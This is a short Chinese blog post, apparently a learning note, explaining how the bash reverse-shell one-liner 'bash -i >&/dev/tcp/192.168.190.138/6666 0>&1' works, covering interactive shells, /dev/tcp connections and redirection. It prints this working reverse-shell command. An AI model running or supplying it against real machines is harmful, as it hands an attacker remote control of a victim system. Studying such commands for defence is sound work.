反弹shell学习

反弹shell命令解析

攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell。

bash -i >&/dev/tcp/192.168.190.138/6666 0>&1

bash -i

启动一个交互式shell
交互式shell的意思就是跟用户交互,你输入一行命令,shell就执行一行命令。当然,有交互式就有非交互式,一个 shell脚本的运行方式,就是非交互式shell。使用echo $-可以查看是否是交互式shell

/dev/tcp/ip/port

与ip:port建立tcp连接

输出重定向

命令 将输出重定向

bash -i > /dev/tcp/192.168.190.138/6666
建立一个交互式shell,然后把输出重定向到TCP连接

< 命令 读取输入

[1]https://www.freebuf.com/articles/network/153986.html

posted @ 2020-07-27 11:23  歇马  阅读(122)  评论(0编辑  收藏  举报